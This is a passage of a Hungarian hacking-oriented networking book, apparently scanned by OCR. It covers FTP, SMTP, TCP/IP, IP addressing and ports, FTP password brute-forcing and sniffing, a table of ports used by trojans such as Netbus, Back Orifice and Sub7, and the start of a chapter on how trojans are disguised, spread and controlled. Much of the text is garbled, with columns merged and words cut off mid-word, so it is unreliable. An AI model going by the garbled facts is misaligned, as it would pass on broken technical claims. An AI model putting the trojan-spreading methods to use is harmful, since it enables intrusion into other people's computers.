átadja a teljes állomány utolsó adatait, a kliens vissza-Az átvitel végének ezeknek a fájloknak a fogadását. Most a szervergép Close bevezetése küld a kliensnek, amely veszi a parancsot, és elfogadja. 5. fázis: adateljárás mutatja a kontrolleljárásának (21. port) az átvi-Az átvitel bezárul. A kliens-adateljárás szintén terminál, a kontroli-lezárása azonban aktívan hagyja a további átvitelekhez.

iga

A paraméterként megadott könyvtárra vált. cd ~ Törli a New néven létrehozott könyvtárat. Is -l

er home-könyvtárára vált. Mkdir New

r New

ktuális könyvtárban található összes fájlt. chmod

elj

okat a fájlokhoz és/vagy könyvtárakhoz.

Az öt kommunikációs fázis az FTP-nél

rendelkezésre álló közel 60 parancsból itt csak a legfontosabk felsorolni:
indul az FTP-kapcsolat a hosthoz. open host Ha egy hosthoz még Ha már fennáll a

s

szükség, ahol lemez nélküli munkaállomásokat (diskless-workst tetnek, mert ezek nem tudják tárolni a logikai címüket. Bootolá tulajdonképpeni indítást értik, hanem csak a fontos konfiguráci telét.
SMTP

a felhasználó azonban már az FTP környezetben található, az open host , a felhasználó azonban még nincs bejelentkezve, a user paranccsal ASCII-re állítja az adatátviteli módot. binary Minden fájltranszfer után elhangzik egy Kapcsoló: ha a Kapcsoló: ha a cr be van kapcsolva (default), akkor a

elépíteni az említett kapcsolódást. user user

g. ascii

adatátviteli módot. bell

ED karakterek LINEFEED-re módosulnak. prompt

pcsolva (default), akkor több fájl átvitelénél minden fájl után egy interaktív

ezik.

A Simple Mail Transfer Protocol alighanem a legtöbbet haszn interneten. Az SMTP már a kezdet kezdetén a Unix-rendszer dett be, és időközben a normál PC-ken is megtalálta a helyét. A kezeli a mail-szoftverét, és itt készít elő egy üzenetet. Ha ezután netét, akkor ez annyi időre kerül a köztes tárba, amíg a TCP a (az OSI modell keretei között) átviszi. A kliensnek és a szervern parancs, illetve reakció áll a rendelkezésére, amelyeket most ne Helyette a szerver és a kliens közti kis párbeszédet mutatjuk be ver részéről mindig pozitív válaszból indulunk ki): • A kliens session-t épít fel a szerverhez. • A szerver megerősíti a szervizek rendelkezésre állását. • A kliens azonosítja magát. • A szerver azonosítja magát. • be. • A szerver a beleegyezését adja. • A kliens átküldi a címzettet. • A szerver válaszol: a postafiók elérhető. • A kliens inicializálja az adatátvitelt.

P-parancsok

k Transfer Protocol nem a TCP-re épül, mint az előbb tárgyalt UDP-re (User Datagram Protocol). Bár ez is adatok átvitelét m a végfelhasználó számára készült, mivel a kapcsolat biztosítatz átviteleknél nincsen jelszólekérdezés, csak a forrás-IP marad delkezésre álljon a szükséges tartomány. A legfontosabb parant, a mode, a get, a put, a verbose és a quit. néhány szó arról, hogyan is folyik itt az adatátvitel. A TFTP ens-szerver elvre épül. A kliens egy kérést küld a szervernek, az megkezdődik az adatátvitel. Minden adatrekord 512 bájtos, és a zza. A kliens akkor tételezi fel automatikusan az átvitel végét, ha rd 512 bájtnál rövidebb.

A kliens átadja a tulajdoképpeni parancsot, amely mail-k

• A szerver felveszi az adatokat, és a befejezéshez kéri a <crlf> csot.

• A kliens az átvitel befejezése után, ahogy megállapod <crlf><crlf> -et. • A kliens a megfelelő paranccsal befejezi a kapcsolatot. • A szerver erre service closing-gal felel.

ocol is az UDP-re (Use Datagram Protocol) épül, és tulajdonképpen ztették, hogy boot-folyamatokat aktiváljon. Erre csak ott van

így nayes konvertereket kellett alkalmazni. s ez igazolja az átvitel tökéletességét. egy multikomputerré olvadnak össze. hanem a legkülönbözőbb adattípusoka. . A címzett minden fogadott csomagról egy ü feladónak. Transmission Control Protocol (TCP) Information Services műveletek biztonsági objektumok és elérési re szolgálnak. • Lehetővé tenni az adatátvitelt dedikált transzportkapcsolato Multiplexing: egy kommunikációs csatorna felépítése.Windowing-nak is nevezik. A TCP az egyik fő protokoll. a már említ UDP (User Datagram Protocol). Ha egyszer még elő az adatátvitelben. kompatibilitási ek fel. amely már nem ak a tiszta szövegküldésre. és a protokoll-család más tagj valamennyi adat megbízható átvitelét garantálja. A transzport rétegben két protokoll található. elszavak központi adminisztrációját. és olyan feladatot kell elvégezni. Transzport réteg A transzport rétegnek a következő feladatokat kell ellátnia: • A kapcsolatokat ellenőrzötten kell felépíteni és bezárni. • Az adatfolyamok priorizálása.as években más mail-rendszereket is bevezettek. gondoskodva arról. am egyidejű átvitelére lehet használni. így a különböző számítótni. • Optimalizált adatfolyam . de nem változtatni ezeket. ve-Server az adatbázis egy biztonsági másolatát tartalmazza a erver kiesésének az esetére. Ebben a hibael funkciói segítenek. amelyben azokat elkü dául minden elküldött csomaghoz egy numerikus értéket generá téknek a segítségével a két egymással összeköttetésben álló szám csomagot azonosít. ent egy számítógép. ha több különböző kapacitású szádelkezésre. Az átmenetekkel nem volt könnyű megbirkózni. lehetővé teszi a decentralizált userID-k. hibafelismerés és folyamatvezérlés a kapcsolat a rocedure Calls-t akkor használják. Ez az eljárás egyébként yre nagyobb figyelmet vívott ki magának a nagyvállalatoknál és a nél. audió stb. vagyis az adatfolyam prioritá küldése. Az RPC-vel a részfeladatokat specifikusan az kvalifikált számítógéphez lehet rendelni. • Ellenőrzés. 1992 óta nagyjából csak a purpose Internet Mail Extensions) használják. amelyet eredetileg a SUN fejleszYellow Pages volt a neve). hogy a fogadott adatok állapotban és sorrendben érkezzenek meg. A pontosabb felépítésébe itt nem megyünk bele. Ez a rendszer. a címzett ennek megfelelő üzenetet küld újrakéri az érintett csomagot. A NIS működtetéséhez a ponensekre van szükség: A TCP a következőkre képes: • Adatfolyam-átvitel • Virtuális full-duplex kapcsolatok • Adatfolyam-vezérlés • Hibafelismerés • Prioritásvezérlés atbázis egy túlméretezett /etc/passwd-fájlt jelenít meg a hálózat ster-Server a megfelelő domainekkel kezeli a NIS-adatbázist. amely nagyon nagy ásokat igényelne. domain a NIS-adatbázisban leképezett számítógépek csoportja. is át lehet küldeni vele. amely a szervertől kap adatokat.

illetve a TCP-vel. En és a Source Address-nek a segítségével ismerhető fel a töredékad zósága. amely a TCP-nél említett tulajdonságok dicsekedhet. mint a TCP. kis táblázat példákat mutat arra. A elküldött csomagokat a célrendszerben újból egyesítik reassembly néven ismertebb. IHL vagy HL (Internet Header Length): az IP-header hossza kokban van megadva. a csomagot részcso bolják. amelyről később. etben automatikusan megszakítja a kapcsolatot a másik számítólten átküldi az adatokat. az adatok hosszáról. ehhez persze még más fontos protokollokra is szükség van. Type of Service: minden bitnek csak ajánlókaraktere van. mint azok a protokollok. Ezt nevezik p lásnak (Buffer Owerflow). például: Internet Protocol (IP) ő számítógép. Ebből látszik. Az UDP ezt a. hogy egy adatcsomag legfeljebb 65535 bájt méretű csomag ennél nagyobb. Az interneten pillanatnyilag m használják. Ezt a bonyolult folyamatot megpróbáljuk egy header-mode megmagyarázni: Version Flags | HL Type of Service Fragment Offset TTL gram Protocol (UDP) Totál Length Indent ztosítatlan protokoll. amelyet néh zatban (LAN) már használnak. és a kapcsolat felépül. hogy milyen szolgáltatások érP-vel. A f azt jelenti. Az Internet Protocol felelős az adatcsomagok átviteléért a mennyi protokolljánál. Ezek és a két következő mező vezérlik a reassembly-t (ld . Hálózati réteg Ez a réteg különböző protokollokat fog össze. egy alkalmazáscsatoló-felület az IP-hez. ot egy három részből álló folyamat vezeti be. az lefagyaszthatja a PC-t. és közli a UDP-header adatainak az t. Az ok. amellyel a távoli számítógéphez. amelyek aktíva az adatok átvitelében. a DoS-támadásokró ben többet mondunk. amelyet three-wayneveznek. hogy a TCP teljes felel a hírének. Hogy ezt elkerüljék. megnyitása után mindkét irányba áramolhatnak az adatok. miszerint biztonságos átviteli protokoll. A roppant rövidre fogott: információkat tartalmaz a kiinduló rtról. illetve a szerverhez olódni. Totál Lenght: az adatcsomag teljes hossza bájtban (max. mondhatni. amiért az UDP li réteghez tartozik: az IP ugyan elő tud állítani kapcsolatokat. azás. A Pre séget nyújt a vezérlőinformációk előnyben részesítésére. 64 K Identification: egy adatcsomag egyértelmű ismertetőjele. a TCP-re bízhatja a kapét. illetve a kliens elküldi a kapcsolatra irányuló ké egy portot. nszportréteg alatti rétegek tartalmaznak. tud adatokat továbbítani az alkalmazásoknak. ha a célszámítógép egy bizonyos idő megerősítést a fogadásukról.s felügyeli. megerősítéssel és egy várakozási listával (a kapcsolathoz) válaszol. hogy nem lépett-e fel súlyos hiba az adatátvitelben. mint például az Internet Explorer. megerősítéssel válaszol. azonban közeledik a váltás a 6. 53 161 SNMP 69 TFTP 25 SMTP 32 FTP 23 80 Protoco Header Checksum Source Address Destination Address Options Padding Data C DNS TELNET HTTP agram Protocol (UDP) Transmission Control Protocol (TCP) z UDP/TCP Version: az IP-verziót jelöli. Az UDP azonban nem kéri a fogadás megerősítehát. Ugyanúgy biztosítatlan. verzióra. Az Internet Protocol egy headerből és az azt követő adatblok többek között az adatcsomagok fragmentálásáért is felelős.

logikai c tárolni. akárcsak a record r den gateway a feldolgozás időpontját jegyzi be. az internetprotokoll igazán komplex. ress: a forrásállomás internetcíme. A fontos ULP-k: Leírás ICMP (Internet Control Message Protocol) 3 TCP EGP UDP (User Loose Source Routing: a küldőállomás előír néhány közb • Strict Source Routing: a küldőállomás minden közbeeső állo • Timestamp Option: az IP-címe helyett. amelyben tartós. de mindez az adatok átvitelét szolgálja. • gments: hogy kiderüljön. és tartalmaz adatokat a logikai forrás-protokollcímhez és a fizikai címhez is. Ekkor a következő router már nem veszi fel. és egy RARP-választ küldenek vissza. Itt van feljegyezve a fogadó címe. amelyet például az interneten talál meghajtó egymagában nem képes arra. hogy a logikai címén számítógépet. • Padding: kitöltő bitek. amely tartalmazza Ezt a módszert tulajdonképpen csak olyan számítógépeknél ha lyeknek nincs olyan adathordozójuk. A felesleges késleltetések elkerülése érdekében a header ela korlátozódik. Az opciók mindenekelőtt a hálózati bakeresést és a méréseket szolgálják. és ezért mindig csak a fizikai cím ismeretével bootolnak . a firmware á niált fizikai címe. A számítógépes kommunikációhoz azonban n nem logikai címet használnak. Itt van feljegyezve a küldő száme. lően kell alakítani az ellenőrzőszámot. és kiosztja a fragAz első fragmentum offset O-t kap. Routolási hibánál. A padding feladata. Ezáltal teljesül a 1 6 bites ás. mivel semmilyen módon nem áll összeköttetés hardvercímével. Offset: egy adatcsomag adatbájtjait számozza. Ahelyett. Tehát a logikai címet a fizikai címre kell cserél az ARP.bitnek a következő a jelentése: gment: olyan hostokhoz. Mivel az időmérés meglematikus a hálózatban. a host egy RARP-kérést küld a f amire azután a RARP-szerverek a hálózatban átnézik a saját refe taikat. Mivel a különböző protokollok az IP-re támaszkodnak. A RARP az ARP-vel ellenkező irányban működik. e (TTL): Minden csomagnak van egy előre megadott maximális mit itt lehet megadni. Ennek az értéknek a dja a címzett megállapítani. hogy egy adatcsomag minden umát fogadta-e. címből állítaná elő a fizikait. Address Resolution Protocol (ARP) -to-Gateway Protocol) 6 Control Protocol) 8 col) ay Protocol) 17 P-k Egy hálózatban minden számítógépnek van egy. hogy tékre csökkenjen. az lamikor el lesz távolítva a hálózatról. minden továbbinál egy fragmezőjének a hosszával növekszik az érték. például huroknál. amelyek nem támogatják a álást. Mint látjuk. meg kell delt ULP (Upper Layer Protocol) protokollt. Options: opcionális mező további információknak. hogy hiányoznak-e töredékek. Reverse Address Resolution Protocol (RARP) ecksum: az IP-header ellenőrzőszáma. Address: a célállomás internetcíme. Ez egy headerből és az ARP-csomagból áll. és a headerben nincs feljegyezve indulási uter úgy dekrementálja (kicsinyíti) a csomagot átfutáskor. hogy bináris null re egészítse ki a frame-et. Sok kódot kiegészítésekhez terveztek. Mivel a TTL-érték (Time tleg a flag és a flag offset értékei is minden routernél változnak. A legfontosabbak: • Record Route: naplózza az adatcsomag útját.

2.1 A Telnet aüzenetekről. a Telnet elindul. Most a szerver a jelszót akarja tudni.ietf. 11. Váltsunk vissza a Telnet-re. például a hibaüzenetek közvetítése.ontrol Message Protocol (ICMP) eladata az üzenetek. hogy távoli s jelentkezzenek be az interneten. Ez az a név. és parancsokat hajtassanak végre mítógépeken. Ez ugyanaz a folya FTP-nél. 12.3. Windows 95/98 (és magasabb verzió) alatt kattintsunk a Sta mire megjelenik egy kis párbeszédablak. 5 Paraméter Problem: Paraméter-probléma. A szokásos módon tárcsázzunk be a szolgáltatónkhoz. eírás cho reply 8 Time est 16 17 6.org/) a következőképpen defini protokoll célja egy általános.de uest 18 ly iós üzeneteinek a listája • Csatlakozás: telnet • terminál típus: vt 100 8. . Gépeljük be a telnet. A fő cél egy szabványos módszer létrehozás keken alapuló folyamatok összekötésére. az internetfejles kafeljegyzése. 8 bit/bájt-orie kációs lehetőséget nyújtani. Kattintsunk a Kapcsolatra. http://www. Ezután nyomjuk le az Enter-t. ehhez a Telnet egy terminált szimulál (szöveg. és készen áll. Most megjelenik: Welcome. azonban kotórésze. a Telneten keresztül programokat is el lehet rendszereken. protokolloknak a használata és a lehetséges biztonságosságuk telei a hackerek cselekményeinek. Kattintsunk a Hálózati rendszer kapcsolatra.exe sort. Megjelenik egy pá 7. 10. és az adatok visszajönnek a számítógépre. amelyeket az ICMP küld: eírás estination unreachable: a célállomás nem érhető el. Sőt. A Telnetet az RFC 854 (Request for Comment. amelyet az FTPlunk (ld. Adjuk meg a login-nevünket. Ugyanaz IP-t. Beírjuk a következőket: • Hostnév: meine-domain. mindkét irányra kiterjedő. 4 -elterelés. A Telnet tehát lehetővé teszi a felhasználóknak. mintha maga is egy fölérendelt protokoll lenne. Kattintsunk az OK-ra. 3. ány alkalmazás és protokoll használata és ztonságosságuk 9. 11 Time exceeded: a timer puffer-erőforrások elhasználva. n megfelelően módosul. gra Windows alatt egy Telnet-kapcsolat a következők szerint épü eteinek listája az információs üzenetekről: 1. a szerver üdvözöl. 3. 4. lejjebb). 5.

FTP ávoli rendszerek közötti adatátvitel egyik módszere.rtassuk magunkat. A kliens egy kérdést küld a távoli számítógép FTP Ezt a kérdést a 21. a jelszó beírása ható. biztonsági kézikönyv) így mutatja be: Az FTP fel(programok és/vagy adatok) közhaszmú átvitele. Az A fontos szolgáltatás az interneten. Az Anonymus FTP-nél bárki bejelentkezhet a sze névként többnyire Anonymus-t. Felépül a Telnet-kapcsolat A Telnettel az az egy gond van. amiért nem látjuk. adatátvitel egy FTP kliensen keresztül történik. pcsolatban vagyunk a szerverrel. távoli számítógépek mplicit (programokon keresztüli) használatának az elősegítése. Ezt a támadást Brute Force-rohamnak is nevezik. Az FTP-nek két fajtája van: a User-FTP és az Anonymus-FTP nél a felhasználónak a login-nevével és a jelszavával kel bejentkeznie. pl. Mivel a Telnet felhasználóazonosítást kíván (loginnév. egy betolakodó. adatok megbízható és hatékony átvitele. Ha valak login-nevet ad meg. mert általa a programok vagy a d minden internet-felhasználó számára elérhetők. A CuteFTP felülete e még egyszer az Enter-t. s különbözőképpen tá a legfontosabb támadási formák. szervereknél ki lehet találni az érvényes login-neveket. illetve FTP da futnia a célszámítógépen. . lehet írni a parancsokat. jelszó). hogy minden adatot kódolatlan szövegként visz át. 2. amit írunk. FTP-szervernek. mivel a szabvá cióban nincs korlátozás a jelszavak beírására. és jelszóként egy e-mail-címet k zel az FTP-szerver nyilvános részéhez kapunk hozzáférést. b3$ stb. ubis2$. elsősorban programokon keresztüli hasznáék. tehát akárhányszor m a jelszót. a szerek fájlrendszerei közötti strukturális különbségekből adódó vesződolása és 4. Az FTP biztonsága Az FTP nem túl biztonságos protokoll. Egy kapcsolat létrehozásához. Bár az FTP-t egy vetlenül is lehet használni. Jelszótámadások Az FTP igen alkalmas a jelszavak kipróbálására. ilyen például a y a WS_FTP. nagyon könnyen megszerezheti a fiókadatokat. A parancssort lehet látni. ha beleolvas a omba. porton keresztül teszi fel. 3. akkor a szerver hibakóddal válaszol. Az FTP-t az for Comments.

Egy módon manipulált szoftvert helyezhet el a szerveren (vírus. 3. Eszerint egy IP-cím négy bájtból áll: 11000010 194 Pl: 11000010 128 1 1 1 0 0 0 1 01001101 77 64 01111100 124 16 32 8 4 álóan alkalmas a Social Engineering-re. felhasználók. eltöltés jelszófájlt. a bb csatornákon (channels) lehetnek. ami azt jelenti. ahol mindig szívesen küldenek t rusokat (ld. amelyeket a chat-en mondott nekik ajtsanak. Az IP-címek archikus. Erről a óló fejezetben további részleteket tudhatnak meg. amelynél a 32 bit 8 bitekre van felosztva. miközben a hálózatok üzemeltetői időbeli kül. mális számként írják le. A rosszul konfigurált kliensprog több elérést engednek meg a szervereknek a helyi erőforrásokra mint amennyi tanácsos volna. Minden IP-cím 32 vel az ilyen számkombinációk igen körülményesek. A legismertebbek közé tartoznak hC és a pIRCh. az IP Numbering Autho pában a RIPE (http://www.net/) felelős az IP-címek kiosz Hogyan néz ki egy IP-cím? A jelenleg használt IP-protokoll az IPv4. amelyek a segítségére lehetnek a további támadás veszélyt jelenthet a fájlcsere is. íg szegmenssel elméletileg több mint négymilliárd (pontosan: 4 29 met lehet kezelni. Leginkább az újoncok vehogy bizonyos parancsokat. szervertől függően (IRC szerver. a trójaiaknál). felhasználói adatok birtokába juthat. IRC-felület A címzés az interneten az IP-címzésen alapul. Többrésztvevős valós idejű konferenciákat tesz lehetővé.ripe. többnyire a p írásmódot használják. az IP-címmel érhető el. pl.net). A beszélgetésekhez ma már kliens valamelyikét használják. blokkokban kölcsönzik IP-címeiket.3. irc. ha egy betörő lózati forgalmakba.ffing TP kódolatlan szövegként továbbítja az adatokat. trójai). A legnagyobb veszélyt azonban maguk ve a szerverprogramok jelentik. Egy támadó elküldetheti például e-mailben magának a Minden kvadráns egy 0 és 255 közti számot reprezentál.euirc. hogy egy ügyfél a szolgáltatójától kapja ges IP-címet. erverre lehet Anonymus-belépéssel szoftvert feltölteni (upload). a szolgáltató megintcsak a hálózattól kölcsönz amelyre csatlakozik.4 Az IP-címzés IRC ternet Relay Chat) az e-mail mellett az egyik legkedveltebb szolerneten. . Az interneten rás egy egyértelmű számmal. De az IRC-parancsokból is sok információt tudhat me felhasználóról.

A C-osztályú hálózatok első negyedében 192-223-ig vannak értékek. TCP/IP-installációk tesztelésére szolgálnak a számítógépe pinggel egy tetszőleges 127-es címre).168.x239.x.x.x). A C- címek kiadása. negyed értékek 224-239-ig a multicast-címe -191-ig vannak értékek.x.xx broadcast-címként szolgál (ezzel az értékkel érhető el egy subnet minden sz Minden IP-cím.bbb. ntesítés céljából az InterNIC.x-ig 240.168. önállóan a hozzájuk utalt címtartományokat. így a négymilliárd elméletileg rendelkezésre álló IP-c már csak egy „töredéke" marad.x. az egyes IP-címterek kezelését nemzeti NIC-eknek és knak adta át.x255. amelynek ez az első szegmense. Ezen az B-osztályú hálózat ugyancsak egy internetre kapcsolódó intranet 172. és az IP-cím fennmaradó 24 bitjét at létesíteni az interneten. amelyek. C-osztályú hálózatokon 255. a 0 a subnet megnevezésé alatt a negyedik negyedben minden gépet értünk 1 -254-ig). gfelelően a négymilliárd IP-címet ismét három osztályba sorolés C-osztályú hálózatokba. Leírás Az A-osztályú hálózatok az első negyedben 1 és 126 közötti értékeket A-osztályú hálózatok tulajdonosai az InterNIC-től (ami most is minden A- Címek x. amelyre információk tudnak bejön menni. az Ipv6 IP-címzési rendszer.4 Aportokról Ebben a könyvben gyakran találkozunk a port fogalmával.x. Már ma is szűkösen megy a B. Az A-osztályú hálózatokat azonban mára már mind kiosztották. amelyben egy IP-cím a mostani 32 bit helyett 12 yú hálózatok Foglalt IP-címek -címek van. ezér magyarázat következik.és C. 192. és a második negyedben van a 0-255-ig ékterület.x-ig hálózaton belüli IP-címeket csak az intraneten belül lehet routolni.x. E B-osztályú hálózatokon belüli IP-címeket cs Ez a 256 C-osztályú hálózat u ot kezel) kapják az első negyedet.0 és x. mivel a szabad számkészlet mindig kisebb lesz. x. amely a további szövegek jobb megértésé A port egy csatolófelület.x) negyedikről szabadon rendelkezhetnek (ez kiszámolva 256 különböző meghatározott hálózatot sem definiálnak és több cím biztosítják az adatcsomagok egyidejű átvitelét. és tok tulajdonosainak az első három szegmenst (aaa. 10.bbb.16.ccc.oszt m kvadránsban megint a teljes értékterület tartozik 0-255-ig. hogy négymilliárd IP-címet nagyon nehezen tud egyetkezelni. Így jöttek létre a hálózati osza.x. amely a 90-es évek elején átvette az elését. Ezért van be állni.x. A B-osztályú hálózatok tulajdonosai a két első negyedet 65536 különböző IP-címet jelent egy B-osztályú hálózaton belül).x. és a maradék 16 bitet adhatják ki maguk (ez 254-ig.ti osztályok kiderült.x. egyetlen x. 172.x-i intraneten belül lehet routolni. belüli IP-címeket csak az intraneten b Az 1.x.31.255-ig routolni. a 255 a negyed 127. mert más célokat 3. internetre kapcsolódó intra-00192.x A B-osztályú hálózatok első net helyi gépei számára van fennt k ki.x.255 Leírás Minden IP-címben a negyedik szegmensben a 0 és 255 érték szertől függően zárolva vannak.x gépei számára van fenntartva. szegmens észen kiosztva kapják. Ezeket időnként D-osztálynak i A jövőbeli fejlesztésekhez zárolva vannak még az 1. aaa. Néhány ilyen csatolófelületet biztosan minden felhasznál .x. 224. az InterNIC-től függetlenül.x.x.x internetre kapcsolódó intranet helyi gépei számára van fenntartva. amelyet a szolgáltatók nem oszthatnak ki. TCP/IP viss Ez az A-osztályú há hurokként szolgál. amelyekben csak az első negyedet határozza meg egy ék háromnegyedet szabadon lehet kiadni.x.x.x.bbb.

Ezért ajánlatos a rendszer gyakori vizsgálata egy el . Ha egy FTP szervert telepítünk a rendszerre. után a monitor vagy a nyomtató jelenti. a Unixnak és a BeOs-nak is. 5536 port van. és gyakran bizonyos szervizekhez vezve. A mail-szolgáltatás ennek megfelelőwn portok szabványa szerint. A nagyobb portokat dinamikus vagy privát portoknak nevezik. itt kérjük le a Netbios Name Service (hálózati PC-k nevei) 138 Netbios Datagramm Service (Adatforgalom a hálózatban) 139 Session Service (a nukerek is ezt használják) Netb A legfontosabb portok áttekintése Valamennyi port listája a http://www. nem pr Domain Name Server (DNS nev Finger SMTP (mailküldéshez. tehát vannak a Linuxnak. így pélő egy weboldal letöltésekor automatikusan kapcsolatot létesít a rver 80. A manipulált adatdéséhez általában adott portokat használnak. errendszer szintén különféle portokat kínál az interneta különböző szolgáltatásokhoz.ilyen például a 7tf Sphere (www. a 25. illetve statikus Well known portok. s a megfelelő szolgramhibáira építenek. ez a port tehát nyitott. ortok komoly biztonsági hiányosságokat is jelentenek a rendszen a portokon keresztül az avatott hackerek be tudnak törni az szerbe.iana. t portok az 1024-49151 portok. Simple Mail Transfer Protocol) 43 SQL * Net (SQL Server Port) 79 (utánanézni. . désre vár. Egy portszkennelés eredménye A következő táblázat néhány fontos portot ír le: Port 21 25 Leírás FTP (File Transfer Protocol) 23 Telnet (Service. ezeket más aját készítésűek is. kkor nyitott. például hogy vannak-e mail-jei) 80 POP3 (Post Office Protocol 3). kié egy weboldal) 53 kereséséhez) 66 (World Wide Web) 110 jeinket 137 (információk egy felhasználóról. Ezek a közkedvelt szervizeknek vannak fennzerint csak az arra jogosult felhasználók érhetik el őket. számú portjával. akkor ez porton vár kérdésre. használhatják. E-maileket például a Simple Mail Transfer TP)-on keresztül küldünk. portszámról megy. Megfelelő védőmechanizmusok nélkül az ilyen bnyire a számítógép lefagyásához vezetnek.ik például az egér és a billentyűzet mint adatbeviteli eszközök. Itt azonban nem fizikai. és az portok lezárása egy tűzfallal. ha egy program ezen a porton egy kérésre (request). A minollok megfelelő porthoz rendelésével kapcsolatos információkat teg tartalmazza. de rendszerint mindenki használhatja őket.de) -. Ez a port bocsátja rendelkezésre a Webhez szükséges HTTP kommunikációs protokollt.org/assignments/ numbers weboldalon található.hackerzbook. ok/ról/on káros adatcsomagok. Portjai minden olyan operációs rendszernek ly támogatja a TCP/IP-t. Ezeket a portokat számokkal jelölik. illetve rossz szándékú támadások agy fogadhatók. Az 1-1023-ig portok a standard. hanem erportokról van szó.

A portokat a trójaiak is használják.de címen kapunk pontos listát. Port 2140 Throat 30129 Paradise 5400 12361 12345 Netbus 2 Pro 21544 Régi Back Orifice (BO) 1243 Régi Sub 7 27374 30100 Hackers Paradise Sub7 Netsphere 456 Trójai Deep Throat 6670 Deep Masters Blade Runner Whack A Mole 20034 Girlfriend Netbus 31337 Deep Throat 6771 A trójai portok Az összes ismert trójai portról a http://www. .un. ezért most felsoroljuk a legismertebb trójaiak legfontosabb portjait.secure.

2 A történelmi minta.2 AutoRun bejegyzések 4.3.1 A BO2K és összetevői Így ismerjük fel a trójait a rendszerünkben 4. fejezet . Miből 4.6.7 Mit csinálnak a hobby-hackerek a trójaiakkal? 4.6.1 Vírus.3 Hogyan szerzik meg a hackerek az IP-t? 4.3 Így álcázzák és terjesztik a trójaiakat 4.6.3 Windows-Registry ez már izgalmas 4.1 4.3.1 A trójaiakat fájlokba integrálják 4.5 A lemezek majdnem ugyanígy működnek 4.3.5.6.egy trójai rémisztő lehetőségekkel 4.4 Módszerek az Explorer.2. és vezérli a szervert 4.6 Sub7 .6 További terjesztési stratégiák 4.6.exe-vel a C:\ meghajtóra 4.4 4.2.5 4.3.Tartalom 4.5 A runonce.2.Hálózati eszköz vagy támadás a Microsoft ellen 4.1 A szerver kiosztása 4.és trójai-szkenner 4.4.4 Elég egy CD és az automatikus lejátszás funkció 4.1 Támad a Sub7 BackOrifice 2K .3.3.4.exe kicserélése áll egy trójai? .3 A trójaiakat az ICQ-val is tovább lehet adni 4.2 Álcázás a WinZip-pel 4.2 A kliens otthon marad.3.

Trójainak tehát egy szoftvert nevezünk. Az elérés csak akkor jöhet létre. Hogy a trójai eltitkolja az elhelyezését. amely látszólag hasznos funkciókat hajt végre. Építtetett egy hatalmas falovat. hogy miből is áll egy trójai. Különböző műveleteket hajt végre. álcázást használ. illetve áldozat PC-re. amelyekről a fertőzött rendszer felhasználójának nincsen tudomása. például a tudtunk nélkül jelszavakat lop vagy fájlokat másol. amely információkat közvetít úgy. a trójai király megszöktette a szépséges görög Helénát. A hackernek meg kell kapnia a fertőzött PC aktuális IP-címét. Amikor látták. De a ló belseje a legerősebb és legbátrabb görög harcosokat rejtette. hogy el is indítsa a szervert. hogy később egy klienssel célzottan érhesse el a kitelepített szervereket. vagyis egy keyboard logfájlt készít. Az RFC 1244 (Site Security Handbook) így írja le a trójait (a szerző fordítása): Trójai lehet egy program.1 A szerver kiosztása Ahhoz. és önfeledten ünnepeltek.ilyenkor a program a trójai program hordozója- .a hackerek pedig a magukévá tették a trójai faló ötletét. hanem a számítógép távirányítását is lehetővé teszik. az kiderül a továbbiakban a különböző trójai programok leírásából. amelyekről a fertőzött rendszer felhasználója mit sem tud. amelyek nemcsak adatokat küldenek el. Itt mutatkozik meg a trójaiak és a klasszikus távkarbantartó programok hasonlósága. 4.2. A hacker ilyenkor többnyire a következő problémákkal szembesül: • A szervert el kell juttatni a felhasználóhoz.2 Miből áll egy trójai? Először is tudni kell. amelyek távoli számítógépek hálózaton vagy telefonvonalon keresztüli kezelését teszik lehetővé. ha a fertőzött számítógépet az IP-címén keresztül sikerül megszólítania. A trójaiak a biztos győzelem tudatában bevontatták a lovat a városba. Trója elesett . amelyről azt sem tudjuk.tehát az eredeti program megváltoztatása. a görög Odüsszeusznak támadt egy ötlete. Azonban a trójai és a származási helye között minden esetben kapcsolatnak kell lennie. és kinyitották a város kapuit a görög seregnek. * A felhasználót rá kell venni arra. Jóval komplexebbek azok a programok.mint program aktív. de az engedélyezetlen kódja alapján olyan funkciókat is elvégez. hogy egy számítógép vagy annak az adatai elérhetővé váljanak.A trójaiak 4. amelybe meg nem engedett kódot ágyaztak . azaz „rá kell sózni". A trójai lehet egy hasznos program. Ezután a görögök visszahúzódtak. amely a város közelében rejtőzött. 4. amely lehetővé teszi az idegen számítógép „távirányítását". akik azután éjszaka kimásztak a ló hasából. Ez a kapcsolat manapság legegyszerűbben az interneten vagy egy hálózaton keresztül valósítható meg. Csak akkor lehet egy (internetes vagy hálózati) kapcsolaton keresztül az IP-cím segítségével az idegen számítógépet elérni. ha a szerver . Erre a görögök évekig ostromolták eredménytelenül Trója városát. a trójaiak isteni jelképét. A legegyszerűbb formájában a trójai egyszerűen egy kémprogram lehet. hogy a számítógépünkre került. telepíteni kell a szervert a cél-. A szerver a központi program. és Trója kapuja elé állíttatta. Még egy kicsit világosabban leírva: a trójai egy meg nem engedett kód egy legitim programon belül . De lehet egy olyan program is. mégis mérhetetlen károkat okozhat. amely egy fájlba naplózza felhasználói beviteleket. hogy a bevitt adatokat egy előre megadott e-mail-címre küldi a következő online-kapcsolatnál. Hogy az akciók lehetőségei milyenek lehetnek. Úgy képzelhető el.1 A történelmi minta Bizonyára mindenki ismeri a homéroszi történetet: Párizs. hogy a hacker megpróbálja elhelyezni vagyis „szórni" a szervert a célrendszereken. Ez a tipikus feladata egy keylogger-nek. Mindig valami váratlant tesz. akárcsak a görög katonák. ként működik. hogy ostrommal nem tudják bevenni. amely valami hasznosat vagy csak valami érdekeset csinál.

és ott beírjuk: netstat .0 forráskódja volt. A második lépésben el kell érni. A kliens ehhez célzottan a fertőzött számítógép IP-címén szólítja meg a szervert. amelyeket a kliens el tud indítani. mert nem lehet tudni. hogy a fertőzött számítógép egyáltalán online-ban van-e. a támadónak egy vezérlőprogramra is szüksége van. zel a kliens az idegen számítógép irányítócentruma lesz. Először is aktiválni. tehát amikor fennáll a kapcsolat a fertőzött számítógéppel. amellyel egy új felhasználót jegyzett be. A szerver futtatása általában két lépésből áll.2. A kapcsolat könnyen felismerhető 4. Egy programozó hozzáfért egy fejlesztői géphez. ha nincs fennálló közveden online-kapcsolat. DOS parancssor-ra váltunk. de kártékonyak is (adatok törlése) vagy kémkedők (adatok átadása). hogy a szerver az operációs rendszerrel együtt automatikusan elinduljon. Az akciók lehetnek viszonylag ártalmatlanok. Hogy hogyan használja ki ezt a veszélyes potenciált. majd telepítem és konfigurálni kell a szervert a rendszeren. válogatás nélkül 